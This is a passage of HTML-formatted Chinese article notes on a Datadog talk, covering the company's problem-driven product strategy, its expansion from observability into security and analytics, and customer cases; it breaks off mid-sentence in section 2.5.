Calibri;color:black;mso-font-kerning:0pt;">。<span lang="EN-US">Datadog</span>的产品开发策略不是直接构建产品，而是解决客户面临的问题，然后再将这些解决方案转化为产品。这种方法确保了产品与客户需求高度一致，并能在快速变化的技术环境中保持领先。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;background:fuchsia;mso-highlight:fuchsia;mso-font-kerning:
0pt;">【思】有了数据，才去构建解决方案。而不是先设计产品，让用户提供更多数据，再形成解决方案</span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">。<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;background:fuchsia;mso-highlight:fuchsia;mso-font-kerning:
0pt;">【客户声音案例】“你能不能先把我的需求100%解决了，而不是解决我70%的问题，然后要求我做这做那，消化你创造的概念，增加我的操作步骤，要我投入更大精力帮你完成你所谓的产品规划，你的那些是多余的。”</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;"><span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#3C87CD;mso-font-kerning:0pt;">通过解决问题来驱动产品演进<span lang="EN-US"><o:p></o:p></span></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">这不是我们在策划<span lang="EN-US">&#39;</span>钱在哪里，接下来会发生什么<span lang="EN-US">&#39;</span>。这是我们在努力为客户解决问题。虽然听起来可能平凡或陈词滥调，但这就是事实。<span lang="EN-US">&#34;<o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000736" data-ratio="0.5611940298507463" data-s="300,640" data-type="png" data-w="1005" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=6c856596&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDu5euXQH442q7qKpDFiaxML9LBRwYsH9QbwGZsYePrvcXjQqrRqa1CAA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section style="margin-bottom: 8px;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">基本逻辑：<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">1. </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">云计算出现 → 创新加速<span lang="EN-US"> + </span>运维复杂性增加<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">2. </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">平台初始聚焦于运维需求<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">3. </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">运维需要更多上下文 → 引入开发者<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">4. </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">开发者和运维需要协作 → 引入日志管理<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">5. </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">日志管理吸引安全团队参与<span lang="EN-US"><o:p></o:p></span></span></section><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">6. </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">平台持续扩展，解决更多问题（用户体验），吸引更多部门参与<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">平台最初专注于帮助运维团队管理基础设施。随着时间推移，平台逐渐扩展到支持更广泛的公司职能，包括开发人员、日志管理和安全团队。这种演进不是预先规划的战略，而是通过持续解决客户问题而自然发展的结果。平台的成功在于它能够快速适应新技术和用例，并促进公司各部门之间的协作。<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">2.2 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">反微笑曲线的发展策略</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“通过拓宽我们的范围并消除痛苦的集成点，我们看到了平台价值的显著提升。”<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“整个平台的价值远高于其各个部分的总和。”<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“讽刺的是，他们（运营团队）离用户的实际体验最近。”<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000737" data-ratio="0.5639024390243902" data-s="300,640" data-type="png" data-w="1025" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=360af654&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDRCI7ff4picmicuW7faU2UoEKE7rUF3CaSw82e0lbzVFt4ckb6066QGXw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">Datadog</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">从最初的可观测性领域起步，逐步扩展到覆盖云安全、软件交付、用户和产品分析等多个新领域。<span lang="EN-US"><o:p></o:p></span></span></p><table cellspacing="0" cellpadding="0"><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;"><td width="109" valign="top" style="border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">阶段<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="225" valign="top" style="border-top: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">问题<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="211" valign="top" style="border-top: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">解决方案<span lang="EN-US"><o:p></o:p></span></span></p></td></tr><tr style="mso-yfti-irow:1;"><td width="109" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">可观测性初期<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="225" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">解决基础可观测性需求<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="211" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">提供实时数据平台<span lang="EN-US"><o:p></o:p></span></span></p></td></tr><tr style="mso-yfti-irow:2;"><td width="109" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">云安全扩展<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="225" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">客户难以跟上云安全需求，工具分散且团队隔离<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="216" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">整合安全功能，提供<span lang="EN-US">DevSecOps</span>解决方案<span lang="EN-US"><o:p></o:p></span></span></p></td></tr><tr style="mso-yfti-irow:3;"><td width="109" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">软件交付扩展<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="225" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">开发和测试工具分散，难以统一管理<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="213" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">进入软件交付领域，简化工具集成<span lang="EN-US"><o:p></o:p></span></span></p></td></tr><tr style="mso-yfti-irow:4;"><td width="110" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">用户和产品分析扩展<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="225" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">分析工具不统一，难以获取全局洞察<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="209" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">提供全面的用户和产品分析功能<span lang="EN-US"><o:p></o:p></span></span></p></td></tr><tr style="mso-yfti-irow:5;mso-yfti-lastrow:yes;"><td width="109" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">云服务管理<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="225" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">团队协作与管理复杂，自动化需求增加<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="213" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">开发云服务管理功能，帮助客户管理和协调团队<span lang="EN-US"><o:p></o:p></span></span></p></td></tr></tbody></table><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">通过不断整合和扩展功能，<span lang="EN-US">Datadog</span>消除了不同工具和团队之间的摩擦，提高了平台的整体价值，目标是帮助客户更好地协调人员、管理系统并自动化响应，以应对复杂的业务需求。<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;background:fuchsia;mso-highlight:fuchsia;mso-font-kerning:
0pt;">【思】反微笑曲线的胜利</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">。<span lang="EN-US">Datadog</span>的定位作为云服务提供商确实限制了它直接接触客户的代码和核心业务的能力。然而，这种限制也恰恰成为了它的优势 ——
通过专注于中间层的监控和分析，<span lang="EN-US">Datadog</span>能够为广泛的客户提供价值，同时避免了深入每个客户特定技术栈和业务模型的复杂性。<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">在面对日益复杂的云环境和技术应用时，为何应当首先关注和支持运营（<span lang="EN-US">Ops</span>）团队的需求。随着技术在人们生活中的作用日益增强，确保数字体验的质量变得至关重要。运营团队虽然不直接参与产品设计或开发，但他们却是最接近实时用户端体验的人。当用户遇到不良体验时，往往是运营团队成员被紧急唤醒去解决问题。因此，在基础设施监控领域，运营团队是最需要支持和关注的对象。</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:red;mso-font-kerning:0pt;">随着技术复杂性的增加，运营团队面临着最大的压力和挑战。他们是处理用户问题的第一线，并且对于维护良好的用户体验至关重要</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">。因此，提供有效的监控工具和诊断信息能够帮助运营团队更好地应对挑战，确保服务的稳定性和可靠性。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">2.3 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">智能化运营，帮你圆梦</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“我们正在收集所有这些丰富、干净的数据，将所有的数据、变更事件、遥测数据以及组织意识，如团队和服务名称等信息结合起来，赋予<span lang="EN-US">Datadog</span>一个绝佳的机会来增加智能，并将所有这些信号转化为人类可消费的故事。”<span lang="EN-US"><o:p></o:p></span></span></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">这是一个故事，单个数据点无法讲述，但我们需要将其汇总成一个故事，这样当我被呼叫时，我面前就有一个故事，我知道发生了什么，知道该找谁谈话，知道该采取什么行动。<span lang="EN-US">&#34;<o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“梦想不是让你在凌晨<span lang="EN-US">3</span>点被数据唤醒去修复系统，而是让你在早上正常时间醒来，收到<span lang="EN-US">Datadog</span>的消息说，我们已经帮你修复了问题，这是一个更美好的未来。”<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000738" data-ratio="0.5604288499025342" data-s="300,640" data-type="png" data-w="1026" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=5ad94785&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDNyu6NnDic3tww5hjBwFrrbOXKsSMsVFQFoRKodaUqVMcj5gRYLGRsWg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">Datadog</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">拥有超过<span lang="EN-US">700</span>种集成，并持续增加更多，这使得它能够收集丰富的数据，结合变更事件和遥测数据，再加上组织内部特有的团队和服务名称等信息，从而提供更加智能的服务。最终目的是将这些数据转化为人类可理解的信息，以便于在出现问题时快速定位并解决问题。<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">演讲者还提到了自动化的发展趋势，未来可能实现无需人工干预的问题解决流程。<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">2.4 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">数字化转型，对抗</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#2E75B5;mso-font-kerning:0pt;">睁眼瞎</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">我们正在努力使整个组织的每个部分都能使用这些工具。<span lang="EN-US">&#34;<span style="mso-spacerun:yes;">  </span><o:p></o:p></span></span></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">如果你不是数字原生企业，你很可能正在被一个数字原生企业颠覆。<span lang="EN-US">&#34;<o:p></o:p></span></span></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:red;mso-font-kerning:0pt;">数字化转型正在迫使组织转型，而他们所使用的工具并不适合现代化的创新需求。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">这种数字化转型正在推动组织变革，公司越来越多的部门开始关心移动应用体验，因为它正成为整个业务的重要支撑。<span lang="EN-US">&#34;<o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000739" data-ratio="0.5643070787637089" data-s="300,640" data-type="png" data-w="1003" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=c2f4869b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDIgq5iavlzjQdKD0Ff2GsP29ibSQVeluatHLmwfX95FuTU31DibJZzia7ZQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">传统饮料公司案例：公司最初使用了少量的产品进行基础设施监控，随着向云端迁移和数字转型的推进，他们逐渐增加了更多产品。然而，公司面临的主要挑战并非技术层面，而是组织结构、人员和政策等方面的阻碍。公司希望使用现代技术栈来解决这些问题，例如审计、强制执行、警报和修复等。<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">电子商务网站案例：以移动应用为例，说明了如何</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:red;mso-font-kerning:0pt;">利用数据分析工具来快速识别、评估和解决问题</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">。这种方法不仅能帮助工程师更好地理解用户体验和业务影响，还能促进跨部门协作，使公司各个部门更加关注移动应用体验，因为它逐渐成为整个业务的重要支撑。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">2.5 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">谁的钱我都要赚</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;And what
we find is there&#39;s a very strong correlation, of course, between what they
